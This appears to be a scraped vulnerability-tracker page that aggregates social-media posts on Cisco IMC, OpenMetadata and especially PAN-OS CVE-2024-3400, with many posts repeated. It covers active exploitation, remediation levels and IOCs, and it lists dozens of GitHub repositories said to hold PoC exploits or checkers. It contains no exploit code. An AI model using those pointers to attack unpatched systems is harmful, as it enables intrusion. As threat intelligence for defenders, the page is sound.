Researchers at Nettitude Labs have published a write-up and PoC for CVE-2024-20356.

This is a command injection vulnerability in the web interface of the Cisco IMC servers that can be used by authenticated attackers to gain root privileges on the device.

Nettitude used the bug to install and play DOOM on the device. Cisco patched the vulnerability last week.

labs.nettitude.com/blog/cve-20

github.com/nettitude/CVE-2024-

sec.cloudapps.cisco.com/securi

##

raptor@infosec.exchange at 2024-04-20T16:07:30.000Z ##

CVE-2024-20356: Jailbreaking a #Cisco appliance to run DOOM #ciscown

labs.nettitude.com/blog/cve-20

github.com/nettitude/CVE-2024-

##

keen456@infosec.exchange at 2024-04-18T20:15:41.000Z ##

@foone
labs.nettitude.com/blog/cve-20

##

simontsui@infosec.exchange at 2024-04-17T17:00:24.000Z ##

Cisco released 3 security advisories:

  • CVE-2024-20356 (8.7 high) Cisco Integrated Management Controller Web-Based Management Interface Command Injection Vulnerability
  • CVE-2024-20373 (5.3 medium) Cisco IOS and IOS XE Software SNMP Extended Named Access Control List Bypass Vulnerability
  • CVE-2024-20295 (8.8 high) Cisco Integrated Management Controller CLI Command Injection Vulnerability

Please note that a proof of concept was publicly disclosed for CVE-2024-20295 before it was patched, making this a zero-day. The Cisco PSIRT is not aware of any malicious use of the vulnerabilities that were described in these advisories. But don't take my word for it, go check them out yourself.

#Cisco #PatchTuesday #zeroday #proofofconcept #CVE_2024_20356 #CVE_2024_20373 #CVE_2024_20295

##

CVE-2024-28848
(8.8 HIGH)

EPSS: 0.04%

updated 2024-04-24T17:06:02

1 posts

### SpEL Injection in `GET /api/v1/policies/validation/condition/` (`GHSL-2023-236`) ***Please note, only authenticated users have access to PUT / POST APIS for /api/v1/policies. Non authenticated users will not be able to access these APIs to exploit the vulnerability. A user must exist in OpenMetadata and have authenticated themselves to exploit this vulnerability.*** The [`‎CompiledRule

simontsui@infosec.exchange at 2024-04-17T17:11:36.000Z ##

Microsoft reports that financially motivated attackers are exploiting several OpenMetadata vulnerabilities to gain access to Kubernetes workloads for cryptomining activity. CVE-2024-28255, CVE-2024-28847, CVE-2024-28253, CVE-2024-28848, CVE-2024-28254 could be exploited by attackers to bypass authentication and achieve remote code execution. "Since the beginning of April, we have observed exploitation of this vulnerability in Kubernetes environments." Microsoft describes the attack flow and provides IOC 🔗 microsoft.com/en-us/security/b

#threatintel #eitw #OpenMetadata #activeexploitation #CVE_2024_28255 #CVE_2024_28847 #CVE_2024_28253 #CVE_2024_28848 #CVE_2024_28254 #IOC

##

CVE-2024-28847
(8.8 HIGH)

EPSS: 0.04%

updated 2024-04-24T17:06:01

1 posts

### SpEL Injection in `PUT /api/v1/events/subscriptions` (`GHSL-2023-251`) ***Please note, only authenticated users have access to PUT / POST APIS for /api/v1/policies. Non authenticated users will not be able to access these APIs to exploit the vulnerability. A user must exist in OpenMetadata and have authenticated themselves to exploit this vulnerability.*** Similarly to the GHSL-2023-250 issu

simontsui@infosec.exchange at 2024-04-17T17:11:36.000Z ##

Microsoft reports that financially motivated attackers are exploiting several OpenMetadata vulnerabilities to gain access to Kubernetes workloads for cryptomining activity. CVE-2024-28255, CVE-2024-28847, CVE-2024-28253, CVE-2024-28848, CVE-2024-28254 could be exploited by attackers to bypass authentication and achieve remote code execution. "Since the beginning of April, we have observed exploitation of this vulnerability in Kubernetes environments." Microsoft describes the attack flow and provides IOC 🔗 microsoft.com/en-us/security/b

#threatintel #eitw #OpenMetadata #activeexploitation #CVE_2024_28255 #CVE_2024_28847 #CVE_2024_28253 #CVE_2024_28848 #CVE_2024_28254 #IOC

##

CVE-2024-2957
(0 None)

EPSS: 0.04%

updated 2024-04-24T16:15:08.880000

2 posts

Rejected reason: **DUPLICATE*** Please use CVE-2024-1983 instead.

adulau at 2024-04-25T07:22:25.901Z ##

Could @cve @CVE_Program or NIST NVD consider adding rejection metadata (e.g., alternative CVEs) in the JSON structure instead of using free-text in the 'rejectedReasons' field?

This would greatly simplify parsing for github.com/cve-search/vulnerab and many other tools.

Sample one: vulnerability.circl.lu/vuln/cv

##

adulau@infosec.exchange at 2024-04-25T07:22:25.000Z ##

Could @cve @CVE_Program or NIST NVD consider adding rejection metadata (e.g., alternative CVEs) in the JSON structure instead of using free-text in the 'rejectedReasons' field?

This would greatly simplify parsing for github.com/cve-search/vulnerab and many other tools.

#cve #vulnerability #opensource #opendata

Sample one: vulnerability.circl.lu/vuln/cv

##

CVE-2024-28253
(9.4 CRITICAL)

EPSS: 0.04%

updated 2024-04-24T14:34:35

1 posts

### SpEL Injection in `PUT /api/v1/policies` (`GHSL-2023-252`) **Please note, only authenticated users have access to PUT / POST APIS for /api/v1/policies. Non authenticated users will not be able to access these APIs to exploit the vulnerability** `CompiledRule::validateExpression` is also called from [`PolicyRepository.prepare`](https://github.com/open-metadata/OpenMetadata/blob/main/openmeta

simontsui@infosec.exchange at 2024-04-17T17:11:36.000Z ##

Microsoft reports that financially motivated attackers are exploiting several OpenMetadata vulnerabilities to gain access to Kubernetes workloads for cryptomining activity. CVE-2024-28255, CVE-2024-28847, CVE-2024-28253, CVE-2024-28848, CVE-2024-28254 could be exploited by attackers to bypass authentication and achieve remote code execution. "Since the beginning of April, we have observed exploitation of this vulnerability in Kubernetes environments." Microsoft describes the attack flow and provides IOC 🔗 microsoft.com/en-us/security/b

#threatintel #eitw #OpenMetadata #activeexploitation #CVE_2024_28255 #CVE_2024_28847 #CVE_2024_28253 #CVE_2024_28848 #CVE_2024_28254 #IOC

##

CVE-2024-3400
(10.0 CRITICAL)

EPSS: 95.36%

updated 2024-04-23T19:57:25.207000

84 posts

A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.

Nuclei template

33 repos

https://github.com/terminalJunki3/CVE-2024-3400-Checker

https://github.com/retkoussa/CVE-2024-3400

https://github.com/Kr0ff/cve-2024-3400

https://github.com/momika233/CVE-2024-3400

https://github.com/HackingLZ/panrapidcheck

https://github.com/codeblueprint/CVE-2024-3400

https://github.com/marconesler/CVE-2024-3400

https://github.com/0x0d3ad/CVE-2024-3400

https://github.com/Chocapikk/CVE-2024-3400

https://github.com/LoanVitor/CVE-2024-3400-

https://github.com/MurrayR0123/CVE-2024-3400-Compromise-Checker

https://github.com/stronglier/CVE-2024-3400

https://github.com/Ravaan21/CVE-2024-3400

https://github.com/W01fh4cker/CVE-2024-3400-RCE-Scan

https://github.com/Yuvvi01/CVE-2024-3400

https://github.com/swaybs/CVE-2024-3400

https://github.com/index2014/CVE-2024-3400-Checker

https://github.com/h4x0r-dz/CVE-2024-3400

https://github.com/hahasagined/CVE-2024-3400

https://github.com/schooldropout1337/CVE-2024-3400

https://github.com/ihebski/CVE-2024-3400

https://github.com/phantomradar/cve-2024-3400-poc

https://github.com/CerTusHack/CVE-2024-3400-PoC

https://github.com/FoxyProxys/CVE-2024-3400

https://github.com/CONDITIONBLACK/CVE-2024-3400-POC

https://github.com/0xr2r/CVE-2024-3400-Palo-Alto-OS-Command-Injection

https://github.com/MrR0b0t19/CVE-2024-3400

https://github.com/sxyrxyy/CVE-2024-3400-Check

https://github.com/ZephrFish/CVE-2024-3400-Canary

https://github.com/ak1t4/CVE-2024-3400

https://github.com/pwnj0hn/CVE-2024-3400

https://github.com/AdaniKamal/CVE-2024-3400

https://github.com/zam89/CVE-2024-3400-pot

screaminggoat at 2024-04-29T19:44:07.390Z ##

Palo Alto Networks updated their security advisory for CVE-2024-3400:

We are also aware of proof-of-concept by third parties of post-exploit persistence techniques that survive resets and upgrades. We are not aware at this time of any malicious attempts to use these persistence techniques in active exploitation of the vulnerability.

This renders their Remediation Guide moot as their recommended action for "Level 3 interactive access" is Update to the latest PAN-OS hotfix and perform a Factory Reset.

Waiting for them to update the KB article to recommend disconnecting the PAN-OS and yeeting it into the sun. 🌞cc: @todb

##

screaminggoat at 2024-04-26T16:34:39.118Z ##

Palto Alto Networks: How to Remedy CVE-2024-3400
So Palo Alto Networks has an actual remediation (read: incident response) knowledge base article for CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 as an exploited zero-day), "based on the current view of the most effective and least disruptive remediation for customers." Their guidance is simple:

  • Level 0 Probe: Unsuccessful exploitation attempt: No indication of compromise = apply hotfix patch
  • Level 1 Test: 0-byte file has been created and is resident on the firewall: still not compromised = apply hotfix patch
  • Level 2 Potential Exfiltration: File on the device has been copied to a location accessible via a web request (common IOC: running_config.xml): apply hotfix patch and perform private data reset (NOTE: PAN states suggested remediation will eliminate the possibility of capturing forensic artifacts)
  • Level 3 Interactive access: Interactive command execution: apply hotfix patch and factory reset.

It's implied that the threat actor would move laterally from the compromised device and establish persistence (additional backdoors, etc.) so threat hunting and containment should be prioritized.

##

screaminggoat at 2024-04-23T20:37:13.723Z ##

You'd expect a government advisory to contain timely and reliable information. NCSC-UK warned about CVE-2024-3400 ten days after infosec publications broke the news. This advisory was difficult to locate even on their homepage. They only mention Unit 42 and Palo Alto Networks' blogs, not Volexity's. Nothing about indicators of compromise either. Their mitigation section sounds as though all available hotfixes weren't released already (they were). The only noteworthy statement is that "Palo Alto Networks is aware of increasing exploitation of this vulnerability. Proof of concepts for this vulnerability have been publicly disclosed by third parties."🔗 ncsc.gov.uk/news/exploitation-

##

screaminggoat at 2024-04-23T11:44:32.227Z ##

Hold onto your Industrial Control Systems! Security Week reports that Siemens Ruggedcom APE1808 configured with a Palo Alto Networks virtual next-generation firewall (NGFW) could be affected by CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 by Palo Alto Networks as an exploited zero-day, OS Command Injection Vulnerability in GlobalProtect Gateway, added to CISA KEV Catalog, has Proof of Concept). "Siemens is preparing updates and recommends specific countermeasures for products where updates are not, or not yet available. Customers are advised to consult and implement the workarounds provided in Palo Alto Networks' upstream security notifications." 🔗 securityweek.com/siemens-indus and advisory cert-portal.siemens.com/produc

##

Walker at 2024-04-23T01:38:04.983Z ##

I would like to thank the script kiddies using base64 encoded commands attempting to compromise

It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.

##

screaminggoat at 2024-04-20T12:58:43.433Z ##

Palo Alto Networks released additional details about CVE-2024-3400: the fact that it is a combination of two bugs in PAN-OS; how an attacker was exploiting it; how disabling telemetry initially worked; and how they fixed it. The timeline from discovery to remediation encompasses the whole blog post. Overall a comprehensive after-action review from a company that notified the public almost immediately of an exploited zero-day. 🔗paloaltonetworks.com/blog/2024

##

screaminggoat at 2024-04-19T16:28:27.963Z ##

Bleeping Computer: GreyNoise and ShadowServer Foundation are reporting active exploitation of CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 by Palo Alto Networks as an exploited zero-day, OS Command Injection Vulnerability in GlobalProtect Gateway, added to CISA KEV Catalog, has Proof of Concept). The good news is that all hotfixes for vulnerable versions of PAN-OS are now released. 🔗 bleepingcomputer.com/news/secu

##

screaminggoat at 2024-04-18T01:26:10.680Z ##

Zscaler observed exploitation of the Palo Alto Networks PAN-OS command injection zero-day vulnerability CVE-2024-3400 following the release of the PoC exploit code. Zscaler provides an attack flow diagram, and a technical analysis of the Upstyle backdoor and its layers. IOC provided. 🔗 zscaler.com/blogs/security-res

##

cR0w at 2024-04-17T18:27:42.525Z ##

Way to live up to the stereotypes, nerds. PAN GlobalProtect exploit attempts using jsquery[.]sex[.]js instead of jsquery[.]max[.]js

##

screaminggoat at 2024-04-17T15:33:21.119Z ##

TrustedSec CTO Justin Elze shared CVE-2024-3400 exploit in the wild on Twitter yesterday, reports that 149.28.194.95 was attempting to exploit CVE-2024-3400

##

screaminggoat@infosec.exchange at 2024-04-29T19:44:07.000Z ##

Palo Alto Networks updated their security advisory for CVE-2024-3400:

We are also aware of proof-of-concept by third parties of post-exploit persistence techniques that survive resets and upgrades. We are not aware at this time of any malicious attempts to use these persistence techniques in active exploitation of the vulnerability.

This renders their Remediation Guide moot as their recommended action for "Level 3 interactive access" is Update to the latest PAN-OS hotfix and perform a Factory Reset.

Waiting for them to update the KB article to recommend disconnecting the PAN-OS and yeeting it into the sun. 🌞cc: @todb

#CVE_2024_3400 #PaloAltoNetworks #eitw #activeexploitation #proofofconcept #poc #DFIR

##

screaminggoat@infosec.exchange at 2024-04-26T16:34:39.000Z ##

Palto Alto Networks: How to Remedy CVE-2024-3400
So Palo Alto Networks has an actual remediation (read: incident response) knowledge base article for CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 as an exploited zero-day), "based on the current view of the most effective and least disruptive remediation for customers." Their guidance is simple:

  • Level 0 Probe: Unsuccessful exploitation attempt: No indication of compromise = apply hotfix patch
  • Level 1 Test: 0-byte file has been created and is resident on the firewall: still not compromised = apply hotfix patch
  • Level 2 Potential Exfiltration: File on the device has been copied to a location accessible via a web request (common IOC: running_config.xml): apply hotfix patch and perform private data reset (NOTE: PAN states suggested remediation will eliminate the possibility of capturing forensic artifacts)
  • Level 3 Interactive access: Interactive command execution: apply hotfix patch and factory reset.

It's implied that the threat actor would move laterally from the compromised device and establish persistence (additional backdoors, etc.) so threat hunting and containment should be prioritized.

#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #DFIR

##

screaminggoat@infosec.exchange at 2024-04-23T11:44:32.000Z ##

Hold onto your Industrial Control Systems! Security Week reports that Siemens Ruggedcom APE1808 configured with a Palo Alto Networks virtual next-generation firewall (NGFW) could be affected by CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 by Palo Alto Networks as an exploited zero-day, OS Command Injection Vulnerability in GlobalProtect Gateway, added to CISA KEV Catalog, has Proof of Concept). "Siemens is preparing updates and recommends specific countermeasures for products where updates are not, or not yet available. Customers are advised to consult and implement the workarounds provided in Palo Alto Networks' upstream security notifications." 🔗 securityweek.com/siemens-indus and advisory cert-portal.siemens.com/produc

#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #Siemens #ICS

##

Walker@infosec.exchange at 2024-04-23T01:38:04.000Z ##

I would like to thank the script kiddies using base64 encoded commands attempting to compromise #paloalto #CVE_2024_3400

It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.

#cyberchef #Panos #cve20243400

##

simontsui@infosec.exchange at 2024-04-20T12:58:43.000Z ##

Palo Alto Networks released additional details about CVE-2024-3400: the fact that it is a combination of two bugs in PAN-OS; how an attacker was exploiting it; how disabling telemetry initially worked; and how they fixed it. The timeline from discovery to remediation encompasses the whole blog post. Overall a comprehensive after-action review from a company that notified the public almost immediately of an exploited zero-day. 🔗paloaltonetworks.com/blog/2024

#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #PANOS #IOC

##

simontsui@infosec.exchange at 2024-04-19T16:28:27.000Z ##

Bleeping Computer: GreyNoise and ShadowServer Foundation are reporting active exploitation of CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 by Palo Alto Networks as an exploited zero-day, OS Command Injection Vulnerability in GlobalProtect Gateway, added to CISA KEV Catalog, has Proof of Concept). The good news is that all hotfixes for vulnerable versions of PAN-OS are now released. 🔗 bleepingcomputer.com/news/secu

#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #kev

##

simontsui@infosec.exchange at 2024-04-18T01:26:10.000Z ##

Zscaler observed exploitation of the Palo Alto Networks PAN-OS command injection zero-day vulnerability CVE-2024-3400 following the release of the PoC exploit code. Zscaler provides an attack flow diagram, and a technical analysis of the Upstyle backdoor and its layers. IOC provided. 🔗 zscaler.com/blogs/security-res

#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #threatintel #IOC

##

cR0w@infosec.exchange at 2024-04-17T18:27:42.000Z ##

Way to live up to the stereotypes, nerds. PAN GlobalProtect exploit attempts using jsquery[.]sex[.]js instead of jsquery[.]max[.]js

#CVE_2024_3400

##

simontsui@infosec.exchange at 2024-04-17T15:33:21.000Z ##

TrustedSec CTO Justin Elze shared CVE-2024-3400 exploit in the wild on Twitter yesterday, reports that 149.28.194.95 was attempting to exploit CVE-2024-3400

#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #threatintel #IOC

##

hdm@infosec.exchange at 2024-04-17T15:21:23.000Z ##

The #golang `gorilla/sessions` directory traversal and file (over)write is now being tracked as GO-2024-2730: go-review.googlesource.com/c/v

This issue was (co)-discovered as part of watchTowr's analysis of the Palo Alto Networks RCE (#CVE_2024_3400), but is entirely separate, and affects a wide range of Go-based web services.

github.com/golang/vulndb/issue

If you use gorilla/sessions with the FilesystemStore, please switch to the CookieStore instead until a patch is available.

##

Walker at 2024-04-23T01:38:04.983Z ##

I would like to thank the script kiddies using base64 encoded commands attempting to compromise

It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.

##

wall_e@ioc.exchange at 2024-04-17T10:07:07.000Z ##

Freshly updated list of very, very expensive toilet paper providers:
paloaltonetworks.com/legal-not

#PaloAlto #cve20243400 #CVE-2024-3400 #SecurityTheater

##

H3liumb0y at 2024-04-17T07:55:21.668Z ##

Urgent: Product and Mitigation Guidance Updates for CVE-2024-3400

Palo Alto Networks has released urgent updates to product and mitigation guidance in the CVE-2024-3400 security advisory. Device telemetry does not need to be enabled on firewalls running an affected version of PAN-OS with GlobalProtect portal or GlobalProtect gateway enabled to be exposed to attacks related to this vulnerability.

Full details of the issue and the latest security advisory updates are available at https://security.paloaltonetworks.com/CVE-2024-3400. We strongly advise customers to immediately upgrade to a fixed version of PAN-OS to protect their devices even when workarounds and mitigations have been applied.

Palo Alto Networks is aware of an increasing number of attacks that leverage the exploitation of this vulnerability. Proof of concepts for this vulnerability have been publicly disclosed by third parties.

For indicators of compromise, please see the Unit 42 Threat Brief and Volexity blog post.

##

catc0n at 2024-04-16T19:31:33.379Z ##

Full Rapid7 technical analysis of Palo Alto Networks via @stephenfewer and new vuln research teammate @fuzz 🤩 Spoiler: Two vulns, one exploit! attackerkb.com/topics/SSTk336T

##

Walker@infosec.exchange at 2024-04-23T01:38:04.000Z ##

I would like to thank the script kiddies using base64 encoded commands attempting to compromise #paloalto #CVE_2024_3400

It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.

#cyberchef #Panos #cve20243400

##

wall_e at 2024-04-17T10:07:07.796Z ##

Freshly updated list of very, very expensive toilet paper providers:
paloaltonetworks.com/legal-not

-2024-3400

##

H3liumb0y@infosec.exchange at 2024-04-17T07:55:21.000Z ##

Urgent: Product and Mitigation Guidance Updates for CVE-2024-3400

Palo Alto Networks has released urgent updates to product and mitigation guidance in the CVE-2024-3400 security advisory. Device telemetry does not need to be enabled on firewalls running an affected version of PAN-OS with GlobalProtect portal or GlobalProtect gateway enabled to be exposed to attacks related to this vulnerability.

Full details of the issue and the latest security advisory updates are available at https://security.paloaltonetworks.com/CVE-2024-3400. We strongly advise customers to immediately upgrade to a fixed version of PAN-OS to protect their devices even when workarounds and mitigations have been applied.

Palo Alto Networks is aware of an increasing number of attacks that leverage the exploitation of this vulnerability. Proof of concepts for this vulnerability have been publicly disclosed by third parties.

For indicators of compromise, please see the Unit 42 Threat Brief and Volexity blog post.

#PAN #paloaltonetworks #paloalto #CVE20243400

##

screaminggoat at 2024-04-29T19:44:07.390Z ##

Palo Alto Networks updated their security advisory for CVE-2024-3400:

We are also aware of proof-of-concept by third parties of post-exploit persistence techniques that survive resets and upgrades. We are not aware at this time of any malicious attempts to use these persistence techniques in active exploitation of the vulnerability.

This renders their Remediation Guide moot as their recommended action for "Level 3 interactive access" is Update to the latest PAN-OS hotfix and perform a Factory Reset.

Waiting for them to update the KB article to recommend disconnecting the PAN-OS and yeeting it into the sun. 🌞cc: @todb

##

screaminggoat at 2024-04-26T16:34:39.118Z ##

Palto Alto Networks: How to Remedy CVE-2024-3400
So Palo Alto Networks has an actual remediation (read: incident response) knowledge base article for CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 as an exploited zero-day), "based on the current view of the most effective and least disruptive remediation for customers." Their guidance is simple:

  • Level 0 Probe: Unsuccessful exploitation attempt: No indication of compromise = apply hotfix patch
  • Level 1 Test: 0-byte file has been created and is resident on the firewall: still not compromised = apply hotfix patch
  • Level 2 Potential Exfiltration: File on the device has been copied to a location accessible via a web request (common IOC: running_config.xml): apply hotfix patch and perform private data reset (NOTE: PAN states suggested remediation will eliminate the possibility of capturing forensic artifacts)
  • Level 3 Interactive access: Interactive command execution: apply hotfix patch and factory reset.

It's implied that the threat actor would move laterally from the compromised device and establish persistence (additional backdoors, etc.) so threat hunting and containment should be prioritized.

##

screaminggoat at 2024-04-23T20:37:13.723Z ##

You'd expect a government advisory to contain timely and reliable information. NCSC-UK warned about CVE-2024-3400 ten days after infosec publications broke the news. This advisory was difficult to locate even on their homepage. They only mention Unit 42 and Palo Alto Networks' blogs, not Volexity's. Nothing about indicators of compromise either. Their mitigation section sounds as though all available hotfixes weren't released already (they were). The only noteworthy statement is that "Palo Alto Networks is aware of increasing exploitation of this vulnerability. Proof of concepts for this vulnerability have been publicly disclosed by third parties."🔗 ncsc.gov.uk/news/exploitation-

##

screaminggoat at 2024-04-23T11:44:32.227Z ##

Hold onto your Industrial Control Systems! Security Week reports that Siemens Ruggedcom APE1808 configured with a Palo Alto Networks virtual next-generation firewall (NGFW) could be affected by CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 by Palo Alto Networks as an exploited zero-day, OS Command Injection Vulnerability in GlobalProtect Gateway, added to CISA KEV Catalog, has Proof of Concept). "Siemens is preparing updates and recommends specific countermeasures for products where updates are not, or not yet available. Customers are advised to consult and implement the workarounds provided in Palo Alto Networks' upstream security notifications." 🔗 securityweek.com/siemens-indus and advisory cert-portal.siemens.com/produc

##

Walker at 2024-04-23T01:38:04.983Z ##

I would like to thank the script kiddies using base64 encoded commands attempting to compromise

It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.

##

screaminggoat at 2024-04-20T12:58:43.433Z ##

Palo Alto Networks released additional details about CVE-2024-3400: the fact that it is a combination of two bugs in PAN-OS; how an attacker was exploiting it; how disabling telemetry initially worked; and how they fixed it. The timeline from discovery to remediation encompasses the whole blog post. Overall a comprehensive after-action review from a company that notified the public almost immediately of an exploited zero-day. 🔗paloaltonetworks.com/blog/2024

##

screaminggoat at 2024-04-19T16:28:27.963Z ##

Bleeping Computer: GreyNoise and ShadowServer Foundation are reporting active exploitation of CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 by Palo Alto Networks as an exploited zero-day, OS Command Injection Vulnerability in GlobalProtect Gateway, added to CISA KEV Catalog, has Proof of Concept). The good news is that all hotfixes for vulnerable versions of PAN-OS are now released. 🔗 bleepingcomputer.com/news/secu

##

screaminggoat at 2024-04-18T01:26:10.680Z ##

Zscaler observed exploitation of the Palo Alto Networks PAN-OS command injection zero-day vulnerability CVE-2024-3400 following the release of the PoC exploit code. Zscaler provides an attack flow diagram, and a technical analysis of the Upstyle backdoor and its layers. IOC provided. 🔗 zscaler.com/blogs/security-res

##

cR0w at 2024-04-17T18:27:42.525Z ##

Way to live up to the stereotypes, nerds. PAN GlobalProtect exploit attempts using jsquery[.]sex[.]js instead of jsquery[.]max[.]js

##

screaminggoat at 2024-04-17T15:33:21.119Z ##

TrustedSec CTO Justin Elze shared CVE-2024-3400 exploit in the wild on Twitter yesterday, reports that 149.28.194.95 was attempting to exploit CVE-2024-3400

##

screaminggoat@infosec.exchange at 2024-04-29T19:44:07.000Z ##

Palo Alto Networks updated their security advisory for CVE-2024-3400:

We are also aware of proof-of-concept by third parties of post-exploit persistence techniques that survive resets and upgrades. We are not aware at this time of any malicious attempts to use these persistence techniques in active exploitation of the vulnerability.

This renders their Remediation Guide moot as their recommended action for "Level 3 interactive access" is Update to the latest PAN-OS hotfix and perform a Factory Reset.

Waiting for them to update the KB article to recommend disconnecting the PAN-OS and yeeting it into the sun. 🌞cc: @todb

#CVE_2024_3400 #PaloAltoNetworks #eitw #activeexploitation #proofofconcept #poc #DFIR

##

screaminggoat@infosec.exchange at 2024-04-26T16:34:39.000Z ##

Palto Alto Networks: How to Remedy CVE-2024-3400
So Palo Alto Networks has an actual remediation (read: incident response) knowledge base article for CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 as an exploited zero-day), "based on the current view of the most effective and least disruptive remediation for customers." Their guidance is simple:

  • Level 0 Probe: Unsuccessful exploitation attempt: No indication of compromise = apply hotfix patch
  • Level 1 Test: 0-byte file has been created and is resident on the firewall: still not compromised = apply hotfix patch
  • Level 2 Potential Exfiltration: File on the device has been copied to a location accessible via a web request (common IOC: running_config.xml): apply hotfix patch and perform private data reset (NOTE: PAN states suggested remediation will eliminate the possibility of capturing forensic artifacts)
  • Level 3 Interactive access: Interactive command execution: apply hotfix patch and factory reset.

It's implied that the threat actor would move laterally from the compromised device and establish persistence (additional backdoors, etc.) so threat hunting and containment should be prioritized.

#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #DFIR

##

screaminggoat@infosec.exchange at 2024-04-23T11:44:32.000Z ##

Hold onto your Industrial Control Systems! Security Week reports that Siemens Ruggedcom APE1808 configured with a Palo Alto Networks virtual next-generation firewall (NGFW) could be affected by CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 by Palo Alto Networks as an exploited zero-day, OS Command Injection Vulnerability in GlobalProtect Gateway, added to CISA KEV Catalog, has Proof of Concept). "Siemens is preparing updates and recommends specific countermeasures for products where updates are not, or not yet available. Customers are advised to consult and implement the workarounds provided in Palo Alto Networks' upstream security notifications." 🔗 securityweek.com/siemens-indus and advisory cert-portal.siemens.com/produc

#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #Siemens #ICS

##

Walker@infosec.exchange at 2024-04-23T01:38:04.000Z ##

I would like to thank the script kiddies using base64 encoded commands attempting to compromise #paloalto #CVE_2024_3400

It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.

#cyberchef #Panos #cve20243400

##

simontsui@infosec.exchange at 2024-04-20T12:58:43.000Z ##

Palo Alto Networks released additional details about CVE-2024-3400: the fact that it is a combination of two bugs in PAN-OS; how an attacker was exploiting it; how disabling telemetry initially worked; and how they fixed it. The timeline from discovery to remediation encompasses the whole blog post. Overall a comprehensive after-action review from a company that notified the public almost immediately of an exploited zero-day. 🔗paloaltonetworks.com/blog/2024

#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #PANOS #IOC

##

simontsui@infosec.exchange at 2024-04-19T16:28:27.000Z ##

Bleeping Computer: GreyNoise and ShadowServer Foundation are reporting active exploitation of CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 by Palo Alto Networks as an exploited zero-day, OS Command Injection Vulnerability in GlobalProtect Gateway, added to CISA KEV Catalog, has Proof of Concept). The good news is that all hotfixes for vulnerable versions of PAN-OS are now released. 🔗 bleepingcomputer.com/news/secu

#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #kev

##

simontsui@infosec.exchange at 2024-04-18T01:26:10.000Z ##

Zscaler observed exploitation of the Palo Alto Networks PAN-OS command injection zero-day vulnerability CVE-2024-3400 following the release of the PoC exploit code. Zscaler provides an attack flow diagram, and a technical analysis of the Upstyle backdoor and its layers. IOC provided. 🔗 zscaler.com/blogs/security-res

#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #threatintel #IOC

##

cR0w@infosec.exchange at 2024-04-17T18:27:42.000Z ##

Way to live up to the stereotypes, nerds. PAN GlobalProtect exploit attempts using jsquery[.]sex[.]js instead of jsquery[.]max[.]js

#CVE_2024_3400

##

simontsui@infosec.exchange at 2024-04-17T15:33:21.000Z ##

TrustedSec CTO Justin Elze shared CVE-2024-3400 exploit in the wild on Twitter yesterday, reports that 149.28.194.95 was attempting to exploit CVE-2024-3400

#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #threatintel #IOC

##

hdm@infosec.exchange at 2024-04-17T15:21:23.000Z ##

The #golang `gorilla/sessions` directory traversal and file (over)write is now being tracked as GO-2024-2730: go-review.googlesource.com/c/v

This issue was (co)-discovered as part of watchTowr's analysis of the Palo Alto Networks RCE (#CVE_2024_3400), but is entirely separate, and affects a wide range of Go-based web services.

github.com/golang/vulndb/issue

If you use gorilla/sessions with the FilesystemStore, please switch to the CookieStore instead until a patch is available.

##

Walker at 2024-04-23T01:38:04.983Z ##

I would like to thank the script kiddies using base64 encoded commands attempting to compromise

It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.

##

wall_e@ioc.exchange at 2024-04-17T10:07:07.000Z ##

Freshly updated list of very, very expensive toilet paper providers:
paloaltonetworks.com/legal-not

#PaloAlto #cve20243400 #CVE-2024-3400 #SecurityTheater

##

H3liumb0y at 2024-04-17T07:55:21.668Z ##

Urgent: Product and Mitigation Guidance Updates for CVE-2024-3400

Palo Alto Networks has released urgent updates to product and mitigation guidance in the CVE-2024-3400 security advisory. Device telemetry does not need to be enabled on firewalls running an affected version of PAN-OS with GlobalProtect portal or GlobalProtect gateway enabled to be exposed to attacks related to this vulnerability.

